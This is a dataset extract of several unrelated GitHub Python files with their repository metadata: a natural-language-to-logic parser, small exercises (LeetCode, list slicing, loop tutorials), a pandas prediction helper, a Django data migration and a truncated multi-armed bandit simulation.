object_quant=get_word_quant(ctxt,sentence,object)\n\n parent_object_pair=None\n iscondition=False\n isconsequence=False\n subjpart=None\n verbpart=verb\n\n #debug_print(\"object\",object)\n #debug_print(\"parent_object_pair\",parent_object_pair)\n objspecialvar=None\n objconst=None \n object_det=get_word_det(ctxt,sentence,object)\n\n if object:\n if not(type(object_data)==list and object_data[0] in [\"and\",\"or\",\"nor\",\"xor\"]):\n object_data=[\"single\",object_data]\n if object_quant and object_quant[\"lemma\"] in [\"some\"]:\n object_quantifier=\"exists\"\n elif object_quant and object_quant[\"lemma\"] in [\"all\",\"every\",\"each\"]: #,\"most\"]:\n object_quantifier=\"forall\" \n else: \n object_quantifier=\"exists\" \n else:\n object_data=[\"single\",\"$dummy_act_object\"] \n object_quantifier=None\n obj_logic=None\n objrepr=None\n #debug_print(\"object_data2\",object_data) \n \n prefernonconcrete=True\n if subject_is_concrete: prefernonconcrete=False\n\n if parent_object_pair and object==parent_object_pair[1]:\n #John had a car which Eve bought\n #Bears who eat fish are strong\n objrepr=parent_object_pair[0]\n elif pronoun(ctxt,object):\n tmp=resolve_pronoun(ctxt,sentence,object,tree,verb,subject)\n #debug_print(\"ctxt[objects] after resolve_pronoun of general handling\",ctxt[\"objects\"])\n if not tmp:\n print(\"error: cannot resolve pronoun, case 4\",object)\n sys.exit(0)\n return None\n object=tmp[1]\n objrepr=tmp[0]\n #objispronoun=True\n elif object and type(object)==dict and variable_shaped_lemma(object[\"lemma\"]):\n ovar=\"?:\"+object[\"text\"]\n objspecialvar=ovar \n objrepr=objspecialvar\n elif object and type(object)==dict and object[\"upos\"] in [\"PROPN\"]:\n objconst=find_make_constant(ctxt,sentence,object)\n objrepr=objconst\n elif is_concrete_thing(ctxt,sentence,object,object_det,verb,iscondition,isconsequence,isobject=True,prefer_non_concrete=True): \n tmp_logic=make_obj_logic(ctxt,sentence,dummysubject,subjpart,verbpart,objpart) \n #debug_print(\"tmp_logic 0\",tmp_logic)\n tmp_logic=prop_flatten_logic_term(tmp_logic) \n #debug_print(\"object\",object)\n #debug_print(\"object_det\",object_det)\n #debug_print(\"tmp_logic\",tmp_logic)\n objconst=make_determined_constant(ctxt,sentence,object,object_det,tmp_logic,verb)\n #debug_print(\"objconst\",objconst)\n objrepr=objconst \n object_quantifier=None \n else:\n #debug_print(\"object is not concrete\") \n ovar=\"?:O\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n objrepr=ovar \n if parent_object_pair and objrepr==parent_object_pair[0]:\n object_quantifier=None \n \n actionrepr=\"?:A\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n \n if not objrepr:\n object_is_positive=True\n else:\n #debug_print(\"obj_logic1\",obj_logic) \n #debug_print(\"about to call obj_logic\") \n\n obj_logic=make_simple_obj_logic(ctxt,sentence,objrepr,subjpart,verbpart,objpart,actionrepr)\n #debug_print(\"ctxt[objects] after make_simple_obj_logic of general handling\",ctxt[\"objects\"])\n #debug_print(\"obj_logic of general handling\",obj_logic) \n if obj_logic and type(obj_logic)==list and obj_logic[0]==\"not\":\n obj_logic=obj_logic[1]\n\n if ((not ctxt[\"isquestion\"]) and (not iscondition) and (not isconsequence) and\n objrepr):\n update_ctxt_objects(ctxt,objrepr,object,obj_logic) \n\n #debug_print(\"obj_logic2\",obj_logic)\n obj_logic_function=make_logic_counted_function(ctxt,sentence,obj_logic,objrepr,\n object,verb,subject,isobject=True,noplural=(iscondition or not verb_is_positive))\n #debug_print(\"obj_logic_function\",obj_logic_function)\n if obj_logic_function and obj_logic_function[0]:\n objsetrepr=[set_function,obj_logic_function[1],subjrepr]\n countatom=logic_replace_el(obj_logic_function[0],objrepr,objsetrepr)\n #debug_print(\"objsetrepr 2\",objsetrepr)\n #debug_print(\"countatom\",countatom)\n\n else:\n objsetrepr=None \n\n #debug_print(\"new obj_logic\",obj_logic) \n #debug_print(\"new objrepr\",objrepr) \n #debug_print(\"new objsetrepr\",objsetrepr) \n\n proplogic=obj_logic\n\n #debug_print(\"child\",child)\n #childchildren=get_children(sentence,child)\n relword=el[\"case\"]\n actionobjectvar=objrepr \n \n if relword: \n if (relword[\"lemma\"] in [\"by\"] and\n actionobjectvar==subjrepr):\n # The car was bought by Mary?\n proplogic=None \n elif (relword[\"lemma\"] in [\"by\"]): \n # The car was bought by Mary?\n objrelation=make_atom_2(ctxt,sentence,verb,verb,positive,subjrepr,actionobjectvar,1) \n proplogic=[\"and\",proplogic,objrelation] \n else:\n objrelation=make_atom_2(ctxt,sentence,verb,relword,positive,actionvar,actionobjectvar,1,\"rel2\") \n #debug_print(\"objrelation\",objrelation)\n proplogic=[\"and\",proplogic,objrelation]\n\n if proplogic: \n if not objspecialvar:\n if object_quantifier:\n proplogic=[object_quantifier,[objrepr],proplogic]\n sublist2.append(proplogic)\n\n #debug_print(\"action_prop_logic sublist2\",sublist2) \n if sublist2:\n andlist2=sublist2\n andlist2=[listop]+andlist2 \n else:\n andlist2=None \n #debug_print(\"action_prop_logic andlist2\",andlist2) \n\n if andlist and andlist2:\n res=[\"and\",andlist,andlist2]\n elif andlist:\n res=andlist\n elif andlist2:\n res=andlist2 \n else:\n #debug_print(\"make_action_prop_logic ends with None ------------------\")\n ctxt[\"isquestion\"]=orig_isquestion\n return None \n \n res=prop_flatten_logic_term(res)\n freevars=collect_free_vars(res)\n bindvars=[]\n for var in freevars:\n if var[2:].startswith(\"O\"):\n #debug_print(\"var\",var)\n bindvars.append(var)\n if bindvars:\n res=[\"exists\",bindvars,res] \n ctxt[\"isquestion\"]=orig_isquestion\n #debug_print(\"make_action_prop_logic res\",res)\n #debug_print(\"make_action had actionvar,subject,subjrepr\",(actionvar,subject,subjrepr))\n #debug_print(\"make_action_prop_logic ended ------------------\")\n return res \n\n\n\ndef make_qualified_atom_1(ctxt,sentence,verb,thing,positive,var,confidence=1,act_type=None,actionrepr=None,propclass=None,blocker_preferred=None): \n res1=make_atom_1(ctxt,sentence,verb,thing,positive,var,confidence,act_type,actionrepr,propclass,blocker_preferred)\n return res1\n\n\ndef make_atom_1(ctxt,sentence,verb,thing,positive,var,confidence=1,act_type=None,actionrepr=None,propclass=None,blocker_preferred=None):\n #debug_print(\"make_atom_1 thing\",thing)\n #debug_print(\"make_atom_1 var\",var)\n #debug_print(\"make_atom_1 type(var)\",type(var))\n #debug_print(\"make_atom_1 thing\",thing)\n #debug_print(\"make_atom_1 type(thing)\",type(thing))\n #debug_print(\"make_atom_1 propclass\",propclass)\n #debug_print(\"make_atom_1 ctxt\",ctxt)\n #debug_print(\"make_atom_1 blocker_preferred\",blocker_preferred)\n if not thing: return None\n if type(thing)==list:\n # John has three nice or big cars.\n # not OK!!! Just a temporary hack for or!!\n thing=thing[1]\n lemma=thing[\"lemma\"] \n else: \n lemma=thing[\"lemma\"]\n\n if (\"isquestion\" in ctxt and ctxt[\"isquestion\"] and \n thing[\"lemma\"] in question_words or (propclass and propclass[\"lemma\"] in question_words)):\n question_thing=True\n else:\n question_thing=False \n #debug_print(\"make_atom_1 question_thing\",question_thing)\n\n if act_type: \n pred=act_type \n elif thing[\"upos\"] in [\"VERB\"]:\n pred=\"act1\" \n elif ((thing[\"upos\"] in [\"PROPN\"]) and\n ((not (\"ner\" in thing )) or not (thing[\"ner\"] in [\"S-NORP\"]))):\n pred=\"has_name\"\n return None\n elif ((thing[\"upos\"] in [\"NOUN\"]) or\n ((thing[\"upos\"] in [\"PROPN\"]) and (\"ner\" in thing ) and (thing[\"ner\"] in [\"S-NORP\"]))):\n pred=\"isa\" \n elif thing[\"upos\"] in [\"NUM\"]:\n pred=\"count\" \n else:\n pred=\"prop\"\n degree=2 \n \n #debug_print(\"pred\",pred)\n if type(lemma)==str and pred==\"prop\":\n lemma=lemma.lower() \n elif pred==\"count\":\n lemma=make_number_from_str(lemma) \n var=[\"$count\",var] \n comp=get_comparison_indicator(ctxt,sentence,thing)\n #debug_print(\"comp\",comp)\n #comp=\"$greater\"\n if comp==\"$greater\":\n pred=comp\n elif comp==\"$less\":\n pred=comp\n else: \n pred=\"=\"\n\n if not positive:\n pred=\"-\"+pred \n\n prop_intensity=default_prop_intensity\n #debug_print(\"propclass\",propclass)\n prop_class=default_prop_class \n if (\"isquestion\" in ctxt and ctxt[\"isquestion\"] and \n (not propclass or question_thing)):\n prop_class=fully_free_variable #unknown_value \n elif not propclass:\n None\n elif propclass and type(propclass)!=dict:\n None \n elif (not (propclass[\"lemma\"] in [\"who\",\"that\",\"which\"]) and\n lemma in class_prop_words): \n prop_class=propclass[\"lemma\"]\n elif (propclass[\"lemma\"] in [\"who\",\"that\",\"which\"] and\n lemma in class_prop_words): \n previous=get_previous_word(sentence,propclass)\n if previous and previous[\"upos\"] in [\"NOUN\"]: \n prop_class=previous[\"lemma\"] \n \n children=get_children(sentence,thing)\n if children:\n for child in children:\n if child[\"deprel\"] in [\"advmod\"] and child[\"upos\"] in [\"ADV\"]:\n if child[\"lemma\"] in maximize_prop_words:\n prop_intensity=max_prop_intensity\n elif child[\"lemma\"] in minimize_prop_words:\n prop_intensity=min_prop_intensity \n if pred in [\"$greater\",\"$less\",\"-$greater\",\"-$less\"]:\n res=[pred,var,lemma]\n else: \n res=[pred,lemma,var]\n if pred in [\"prop\",\"-prop\"]:\n res.append(prop_intensity)\n res.append(prop_class) \n if blocker_preferred==None: blocker_preferred=False\n if confidence!=None and ctxt[\"confidences\"]:\n res.append([confidence_function,confidence,blocker_preferred])\n elif blocker_preferred:\n res.append([confidence_function,1,blocker_preferred])\n\n if actionrepr:\n res.append(actionrepr) \n #debug_print(\"make_atom_1 res\",res) \n \n if not (pred in [\"=\",\"!=\",\"isa\",\"-isa\",\"$greater\",\"$less\",\"-$greater\",\"-$less\"]) and ctxt[\"addctxt\"]:\n ctxtargument=make_ctxt_argument(ctxt,sentence,verb,thing)\n res.append(ctxtargument)\n #debug_print(\"make_atom_1 res\",res) \n #print(\"make_atom_1 res\",res) \n return res\n\ndef make_atom_2(ctxt,sentence,verb,thing,positive,var1,var2,confidence=1,act_type=None,actionrepr=None,blocker_preferred=None): \n #debug_print(\"make_atom_2 verb\",verb)\n #debug_print(\"make_atom_2 thing\",thing)\n #debug_print(\"make_atom_2 positive\",positive)\n #ebug_print(\"make_atom_2 var1 var2\",[var1,var2])\n reversepos=False\n lemma=thing[\"lemma\"]\n if \"relation\" in thing:\n relation_type=thing[\"relation\"]\n elif (verb[\"lemma\"]==\"be\" and \"relatedobjects\" in verb and \n verb[\"relatedobjects\"][0][\"case\"][\"lemma\"]==\"of\"):\n # Elephants are afraid of mice \n relation_type=\"of\" \n lemma=thing[\"lemma\"] #\"afraid\" #verb[\"relatedobjects\"][0][\"case\"][\"lemma\"]\n else:\n relation_type=\"\" \n \n #debug_print(\"make_atom_2 thing\",thing)\n #debug_print(\"make_atom_2 lemma\",lemma) \n #debug_print(\"make_atom_2 raw relation_type\", relation_type) \n \n if relation_type and relation_type in nlpglobals.relation_type_translate:\n relation_type=nlpglobals.relation_type_translate[relation_type]\n elif not relation_type:\n if lemma in nlpglobals.relation_type_translate:\n relation_type=nlpglobals.relation_type_translate[lemma]\n act_type=None\n actionrepr=None\n elif lemma in nlpglobals.relation_type_reverse_translate: \n reversepos=True\n relation_type=nlpglobals.relation_type_reverse_translate[lemma] \n act_type=None\n actionrepr=None\n\n if relation_type in nlpglobals.relation_type_negative_translate:\n relation_type=nlpglobals.relation_type_negative_translate[relation_type]\n positive=not positive\n\n #debug_print(\"make_atom_2 translated relation_type\", relation_type) \n \n if relation_type or lemma in [\"have\"]:\n pred=\"rel2\"\n elif act_type:\n pred=act_type \n else:\n pred=\"act2\" \n\n if positive:\n None #pred=\"rel2\"\n else:\n pred=\"-\"+pred #\"-rel2\" \n\n if relation_type in [\"of\",\"than\",\"for\"]: \n pred=pred+\"_\"+relation_type \n elif relation_type:\n lemma=relation_type \n\n if blocker_preferred==None: blocker_preferred=False\n\n if reversepos: \n res=[pred,lemma,var2,var1] \n else: \n res=[pred,lemma,var1,var2] \n #(\"res2\",res)\n comparison_pred=False\n\n comp=get_comparison_indicator(ctxt,sentence,thing)\n #debug_print(\"comp\",comp)\n\n #debug_print(\"pred\",pred)\n #debug_print(\"var1\",var1)\n #debug_print(\"var2\",var2)\n #debug_print(\"res\",res)\n \n if (pred in [\"rel2_than\"] and comp and\n (type(var1)==list and var1[0] in [measure_function+\"1\"] or\n type(var2)==list and var2[0] in [measure_function+\"1\"])):\n if var1[1] in [\"length\"]:\n #debug_print(\"length detected\")\n newpred=comp\n res=[newpred,[count_function,res[2]],[count_function,res[3]]] \n return res\n\n if (pred in [\"rel2_than\",\"do2\",\"act2\"] and \n type(var1)==list and var1[0] in [measure_function+\"1\"] and\n type(var2)==list and var2[0] in [measure_function+\"1\"]):\n newpred=None\n for el in measure_words:\n if \"morenouns\" in el and lemma in el[\"morenouns\"]:\n newpred=\"$greater\"\n break\n elif \"lessnouns\" in el and lemma in el[\"lessnouns\"]:\n newpred=\"$less\"\n break \n if lemma in comparison_words:\n if \"less\" in comparison_words[lemma] and comparison_words[lemma][\"less\"]:\n newpred=\"$less\"\n elif \"more\" in comparison_words[lemma] and comparison_words[lemma][\"more\"]:\n newpred=\"$greater\"\n elif \"equal\" in comparison_words[lemma] and comparison_words[lemma][\"equal\"]:\n newpred=\"=\" \n if newpred: \n comparison_pred=newpred \n res=[newpred,[count_function,res[2]],[count_function,res[3]]] \n #debug_print(\"res3\",res)\n\n if confidence!=None and ctxt[\"confidences\"]:\n res.append([confidence_function,confidence,blocker_preferred])\n elif blocker_preferred:\n res.append([confidence_function,1,blocker_preferred])\n\n if actionrepr and not comparison_pred and not (pred in [\"rel2\",\"-rel2\"]): #,\"rel2_of\",\"-rel2_of\",\"rel2_than\",\"-rel2_than\"]):\n res.append(actionrepr)\n\n #debug_print(\"res4\",res) \n if ctxt[\"addctxt\"] and not comparison_pred:\n if not (pred in [\"isa\",\"-isa\"]):\n if thing[\"upos\"]==\"VERB\" and word_has_feat(verb,\"VerbForm\",\"Part\"):\n ctxtargument=make_ctxt_argument(ctxt,sentence,verb,thing)\n else: \n ctxtargument=make_ctxt_argument(ctxt,sentence,verb,thing)\n res.append(ctxtargument) \n if (pred==\"act2\" and positive and confidence>0.9 and \n (not noframes) and (not nonewframes) and (not noframevars)):\n ctxt[\"framenr\"]=ctxt[\"framenr\"]+1 \n return res \n\ndef get_comparison_indicator(ctxt,sentence,thing):\n #debug_print(\"get_comparison_indicator thing\",thing)\n if not thing: return None\n if thing[\"upos\"] in [\"ADJ\"] and is_larger_word(ctxt,sentence,thing):\n return \"$greater\"\n elif thing[\"upos\"] in [\"ADJ\"] and is_smaller_word(ctxt,sentence,thing):\n return \"$less\" \n children=get_children(sentence,thing)\n for child in children:\n if (child[\"deprel\"] in [\"advmod\"] and is_larger_word(ctxt,sentence,child)):\n return \"$greater\"\n if (child[\"deprel\"] in [\"advmod\"] and is_smaller_word(ctxt,sentence,child)):\n return \"$less\" \n parent=get_parent(sentence,thing) \n if not parent: return None\n children=get_children(sentence,parent)\n for child in children:\n if (child[\"deprel\"] in [\"advmod\"] and is_larger_word(ctxt,sentence,child)):\n return \"$greater\"\n if (child[\"deprel\"] in [\"advmod\"] and is_smaller_word(ctxt,sentence,child)):\n return \"$less\" \n return None\n\ndef is_larger_word(ctxt,sentence,word):\n if not word: return False\n if word[\"lemma\"] in larger_words: return True\n return False\n\ndef is_smaller_word(ctxt,sentence,word):\n if not word: return False\n if word[\"lemma\"] in smaller_words: return True\n return False \n\n\n\ndef make_ctxt_argument(ctxt,sentence,verb,thing=None):\n #debug_print(\"make_ctxt_argument thing\",thing)\n #debug_print(\"make_ctxt_argument verb\",verb)\n beword=find_related_be_word(ctxt,sentence,verb)\n #debug_print(\"make_ctxt_argument beword\",beword)\n if (thing and verb==thing and type(verb)==dict and beword and\n word_has_feat(verb,\"VerbForm\",\"Part\")): # and word_has_feat(verb,\"Voice\",\"Pass\")):\n #debug_print(\"cp be case 1\")\n # John is defeated\n # John is nice and defeated\n #beword=find_related_be_word(ctxt,sentence,verb)\n #debug_print(\"cp be\",beword)\n #if beword:\n verb=beword \n elif type(verb)==dict and beword and word_has_feat(verb,\"Degree\",\"Cmp\"):\n verb=beword\n elif verb and type(verb)==dict and verb[\"upos\"] in [\"VERB\",\"AUX\"]: #,\"ADJ\"\n #2debug_print(\"cp be case 2\")\n if \"be\" in verb:\n verb=verb[\"be\"]\n #debug_print(\"make_ctxt_argument verb 2\",verb) \n if verb and type(verb)==dict and verb[\"upos\"] in [\"VERB\",\"AUX\"]: \n tensevalue=get_word_feat(verb,\"Tense\")\n #debug_print(\"make_ctxt_argument tensevalue\",tensevalue)\n if not tensevalue: \n if word_has_feat(verb,\"VerbForm\",\"Inf\"):\n children=get_children(sentence,verb)\n for child in children: \n if child[\"deprel\"]==\"aux\" and child[\"lemma\"]==\"do\" and get_word_feat(child,\"Tense\"):\n tensevalue=get_word_feat(child,\"Tense\")\n break\n if not tensevalue: \n tvar=\"?:Tense\"+str(ctxt[\"varnum\"]) \n ctxt[\"varnum\"]+=1\n tensevalue=tvar\n else:\n tvar=\"?:Tense\"+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n tensevalue=tvar\n\n #debug_print(\"tensevalue\",tensevalue)\n #debug_print(\"thing\",thing)\n\n framenr=ctxt[\"framenr\"]\n if noframes or noframevars: \n None \n elif tensevalue==\"Past\" and (\"isquestion\" in ctxt) and ctxt[\"isquestion\"]:\n framenr=frame_var_prefix+str(ctxt[\"varnum\"])\n ctxt[\"varnum\"]+=1\n ctargument=[ctxt_function,tensevalue,framenr]\n #debug_print(\"ctargument\",ctargument)\n return ctargument\n\ndef find_related_be_word(ctxt,sentence,word):\n #debug_print(\"word\",word)\n if not word or type(word)!=dict: return None\n children=get_children(sentence,word)\n for el in children:\n if el[\"lemma\"]==\"be\" and el[\"upos\"]==\"AUX\":\n return el\n parent=get_parent(sentence,word)\n if parent:\n children=get_children(sentence,parent)\n for el in children:\n if el[\"lemma\"]==\"be\" and el[\"upos\"]==\"AUX\":\n return el\n return None \n\ndef is_keep_free_var(ctxt,var):\n if is_var(var):\n if var.startswith(\"?:Tense\"): return True\n if var.startswith(\"?:Unit\"): return True\n else: return False\n else: return False\n\n\n# =========== the end ==========\n","repo_name":"tammet/nlpsolver","sub_path":"nlpproperlogic.py","file_name":"nlpproperlogic.py","file_ext":"py","file_size_in_byte":69142,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2323111574","text":"class Solution(object):\n def maximumSwap(self, num):\n \"\"\"\n :type num: int\n :rtype: int\n \"\"\"\n counter = [0] * 10\n snum = str(num)\n lnum = len(snum)\n for d in map(int, snum):\n counter[d] += 1\n for i, d in enumerate(map(int, snum)):\n for di in xrange(9, d, -1):\n if counter[di] > 0:\n for j in xrange(lnum - 1, i, -1):\n if int(snum[j]) == di:\n return int(snum[:i] + snum[j] + snum[i + 1:j] + snum[i] + snum[j + 1:])\n counter[d] -= 1\n return num\n","repo_name":"ckclark/leetcode","sub_path":"py/maximum-swap.py","file_name":"maximum-swap.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24734760496","text":"# Masz listę\n# list_a = [1, 2, 3, 4, 5, 6, 7]\n# Przy pomocy operacji, z którymi zapoznaliśmy się na tej lekcji przekształć daną listę w następujące listy:\n#\n# [1, 3, 5, 7]\n# [2, 4, 6]\n# [7, 6, 5, 4, 3, 2, 1]\n# [6, 4, 2]\n# [1, 7]\n# [7, 4, 1]\n# [] # pusta lista\n# [5, 6, 7]\n\nlist_a = [1, 2, 3, 4, 5, 6, 7]\nlist_b = list_a[::2]\nlist_c = list_a[1::2]\nlist_d = list_a[::-1]\nlist_e = list_a[-2::-2]\nlist_f = list_a[::len(list_a) - 1]\nlist_g = list_a[::-3]\nlist_h = list_a.copy()\nlist_h.clear()\nlist_i = list_a[4:]\n\nprint(f\"{list_a}\\{list_b}\\n{list_c}\\n{list_d}\\n{list_e}\\n{list_f}\\n{list_g}\\n{list_h}\\n{list_i}\")\n\n","repo_name":"Py-Za/basics04","sub_path":"script04.py","file_name":"script04.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24967356725","text":"from pathlib import Path\nimport pandas as pd\n\n\ndef save_preds(\n model, chunksize, pred_path, tourn_path, feature_cols, output=False, save=True\n):\n ids = []\n preds = []\n tourn_iter_csv = pd.read_csv(tourn_path, iterator=True, chunksize=chunksize)\n for chunk in tourn_iter_csv:\n df = chunk[feature_cols]\n out = model.predict(df)\n ids.extend(chunk[\"id\"])\n preds.extend(out)\n tourn_iter_csv.close()\n\n preds_out = pd.DataFrame({\"id\": ids, \"prediction\": preds})\n if save:\n if not ((pred_path.parent).exists()):\n pred_path.parent.mkdir()\n preds_out.to_csv(pred_path, index=False)\n if output:\n return preds_out\n","repo_name":"djliden/numerai_utils","sub_path":"src/utils/eval.py","file_name":"eval.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30976625821","text":"# for (int i = 0; i <= 9; ++i){\n# }\n# for i in range(0, 10): # 0~9\n\n# for i in 0,1,2,3,4,5,6,7,8,9:\n# 코드\n\n# 반복문\n# 정해진 횟수 만큼 특정코드를 실행하도록 만든 문장\n# 파이썬 에서는 for 문과 while 문이 지원\n\nprint('Hello, World!!') # 한번 출력\n\nprint('Hello, World!!') # 3번 출력\nprint('Hello, World!!')\nprint('Hello, World!!')\n\n# 만일, 100번 출력해야 한다면 복붙을 계속할 것인가?\n# 또한, 반복시 출력하는 문구가 변경된다면? - 다시 수정\n# 효율적인 반복실행을 위해서 반복문을 사용함\n\n# for 반복변수 in range(시작값, 종료값-1, 증감값):\n# 반복실행할 문장\n\n# range 함수 사용하기\n# range(숫자) - 0 부터 숫자 -1 까지의 범위\nlist(range(10)) # 0~(10-1) 범위\n\n# range(시작, 끝-1) - 시작값부터 끝값-1 까지의 범위\nlist(range(1, 45+1))\n\n# range(시작, 끝-1, 증감값)\n# => 시작값에서 증감값을 처리해서 끝값-1의 범위까지 출력\nlist(range(1, 10, 2))\nlist(range(0, 10, 2))\n\n# ex) 1~100\n# 반복문을 이용한다면?\nlist(range(1, 100+1))\n\nfor i in range(1, 100+1):\n print(i, end=', ') # 출력문 줄바꿈 하지 않기\n# print 함수로 값 출력시 줄바꿈 문자가 자동 추가됨\n# 줄바꿈 문자대신 다른 문자로 대신하려면 end 속성 사용\n\n# ex) 100~1\n# for i in range(1, 100+1):\n# print(i, end=', ')\nlist(range(100, 0, -1))\nfor i in range(100, 0, -1):\n print(i, end=', ')\n\n# ex) 1~100 사이 정수 중 짝수만 출력\nlist(range(2, 100+1, 2))\nfor i in range(2, 100+1, 2):\n print(i, end=', ')\n\nlist(range(1, 100+1))\nfor i in range(1, 100+1):\n if i % 2 == 0: print(i, end=' ')\n\n# 1~100 사이 정수들의 모든 합 계산 출력\nisum = 0\nfor i in range(1, 100+1):\n isum = isum + i\nprint(isum)\n\n# 가우스 덧셈 공식을 이용해서\n# 1~100 사이 정수들의 모든 합 계산 출력\n# x~y 까지의 숫자를 더한 합을 구하는 공식\n# ((x + y) * (y - x + 1)) /2\n((1 + 100) * (100 - 1 + 1)) / 2\n\nrange(1, (100+1)*50)\n\nsum = 0\nfor i in range(1, 51): # 1~100 사이에서 모든 쌍의 합의 전체 개수의 절반인 50개\n sum += i + (101 - i)\nprint(sum)\n\n# 문자열에 반복문 적용하기\n# => 문자열에서 문자를 하나씩 가져와서 출력함\nfor i in 'Hello, World!!':\n print(i, end=' ')\n\n# ex) 단을 입력받아 해당 단의 구구단 출력\ndan = int(input('단?'))\nfor i in range(1, 9+1):\n print(f'{dan} x {i} = {dan * i}')\n\n# p79 ex3) 3의 배수지만 2의 배수는 아닌 정수 출력하고 누적합도 계산해서 출력 (1~100)\nhap = 0\nresult = ''\nfor i in range(1, 100+1):\n if i % 3 == 0 and i % 2 != 0:\n result += str(i) + ' '\n hap += + i\n\nprint(result)\nprint(hap)\n","repo_name":"ktgkid/python39","sub_path":"12for.py","file_name":"12for.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70188050009","text":"from django.db import migrations\nfrom estimation.metaproduct.models import MetaProduct, MetaComponent, MetaService\nfrom estimation.template.models import ProductTemplate\n\ndef create_product_template(apps, schema_editor):\n carbonless_class = MetaProduct.objects.get(name='Carbonless Form')\n callingcard_class = MetaProduct.objects.get(name='Calling Card')\n\n dataset = [\n {'name': 'Carbonless Form 8x11 100s 2ply', \n 'description': 'Carbonless Form 8x11; 100s; 2ply (W/Y); GTO Process;',\n 'meta_product': carbonless_class,\n 'components': [\n {'meta_component': 'Form', 'quantity': 100, \n 'length_value':11, 'width_value':8, 'size_uom':'inch',\n 'machine_option': 'Heidelberg GTO',\n 'meta_material_options': ['Carbonless White', 'Carbonless Yellow']\n },\n {'meta_component': 'Backing', 'quantity': 1, \n 'length_value':11, 'width_value':8, 'size_uom':'inch',\n 'meta_material_options': ['Kraft #80']\n }\n ],\n 'services': [\n {'meta_service': 'Layout', 'input_quantity': 1,\n 'operations': [\n {'name': 'Create Layout', 'options': ['Creatives Layout Operation']}\n ]},\n {'meta_service': 'Form Raw-to-Running Cut',\n 'operations': [\n {'name': 'Cut Sheet', 'options': ['Polar Cutting Operation']}\n ]},\n {'meta_service': 'Backing Raw-to-Running Cut',\n 'operations': [\n {'name': 'Cut Sheet', 'options': ['Polar Cutting Operation']}\n ]},\n {'meta_service': 'Printing',\n 'operations': [\n {'name': 'Front Print', 'options': ['GTO 2-Color Printing']}\n ]},\n {'meta_service': 'Form Running-to-Final Cut',\n 'operations': [\n {'name': 'Cut Sheet', 'options': ['Polar Cutting Operation']}\n ]},\n {'meta_service': 'Gathering',\n 'operations': [\n {'name': 'Collate Sheets', 'options': ['Finishing Gathering Operation']}\n ]},\n {'meta_service': 'Padding',\n 'operations': [\n {'name': 'Pad Sheets', 'options': ['Finishing Padding Operation']}\n ]}\n ]}\n ]\n\n for template_data in dataset:\n components_data = template_data.pop('components')\n services_data = template_data.pop('services')\n product_template = ProductTemplate.objects.create(**template_data)\n product_class = product_template.meta_product\n\n for component_data in components_data:\n meta_component_name = component_data.pop('meta_component')\n machine_option_name = component_data.pop('machine_option') if 'machine_option' in component_data else None\n material_options = component_data.pop('meta_material_options')\n component_class = product_class.meta_product_datas.get(name=meta_component_name)\n component_class = MetaComponent.objects.get(pk=component_class.pk)\n if machine_option_name is not None:\n machine_option_class = component_class.meta_machine_options.get(machine__name=machine_option_name)\n component_data['machine_option'] = machine_option_class\n\n component_template = product_template.add_component_template(\n meta_component=component_class, **component_data)\n\n for material_option in component_class.meta_material_options.filter(item__name__in=material_options).all():\n component_template.add_material_template(material_option)\n\n for service_data in services_data:\n meta_service_name = service_data.pop('meta_service')\n operations_data = service_data.pop('operations')\n meta_service = product_class.meta_product_datas.get(name=meta_service_name)\n meta_service = MetaService.objects.get(pk=meta_service.pk)\n service_template = product_template.add_service_template(\n meta_service=meta_service, **service_data)\n \n for operation_data in operations_data:\n operation_name = operation_data.pop('name')\n options_data = operation_data.pop('options')\n meta_operation = meta_service.meta_operations.get(name=operation_name)\n operation_template = service_template.add_operation_template(meta_operation=meta_operation)\n\n for option in meta_operation.meta_operation_options.filter(operation__name__in=options_data):\n operation_template.add_operation_option_template(meta_operation_option=option)\n \n\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('estimation', '1002_generate_test_data_productclasses')\n ]\n\n operations = [\n migrations.RunPython(create_product_template, reverse_code=migrations.RunPython.noop),\n ]\n","repo_name":"janlajara/printestimate","sub_path":"estimation/migrations/1003_generate_test_data_producttemplates.py","file_name":"1003_generate_test_data_producttemplates.py","file_ext":"py","file_size_in_byte":4983,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"13175663730","text":"import random\nimport numpy as np\nfrom matplotlib import pyplot as plt\nimport sys\n\n# Sample average formula: Q_{n+1} = Q_n + 1/n * [R_n - Q_n]\n# alpha = 0.1 update formula: Q_{n+1} = Q_n + alpha * [R_n - Q_n]\n\ndef ten_arm_bandit(sample_avg):\n alpha = 0.1\n epsilon = 0.1\n num_iter = 10000\n num_run = 300\n\n # Average reward at each iteration/step\n # Should be normalized by num_run\n # avg_step_reward = [0.0 for x in range(num_iter)]\n avg_step_reward = np.zeros(num_iter)\n # Average ratio of picking up optimal action at each iteration/step\n # Should be normalized by num_run\n # avg_opt_ratio = [0.0 for x in range(num_iter)]\n avg_opt_ratio = np.zeros(num_iter)\n\n for i in range(num_run):\n # Start each simulation\n true_values = [0.0 for x in range(10)]\n\n # Number of occurances for each action\n num_action = [0.0 for x in range(10)]\n q_estimate = [0.0 for x in range(10)]\n for j in range(num_iter):\n # Pick the action\n action_idx = -1\n # Perform epsilon greedy action selection\n if random.random() <= epsilon:\n # Randomly pick an action\n action_idx = random.randint(0, 9)\n else:\n max_est = max(q_estimate)\n max_est_idx = [i for i, x in enumerate(q_estimate) if x == max_est]\n action_idx = random.choice(max_est_idx)\n # Perform action\n # Get reward, with noise around the true reward\n r = np.random.normal(true_values[action_idx], 1)\n avg_step_reward[j] += r\n if true_values[action_idx] == max(true_values):\n # If choosing the optimal action\n avg_opt_ratio[j] += 1\n # Update estimate\n num_action[action_idx] += 1\n if sample_avg:\n # Sample 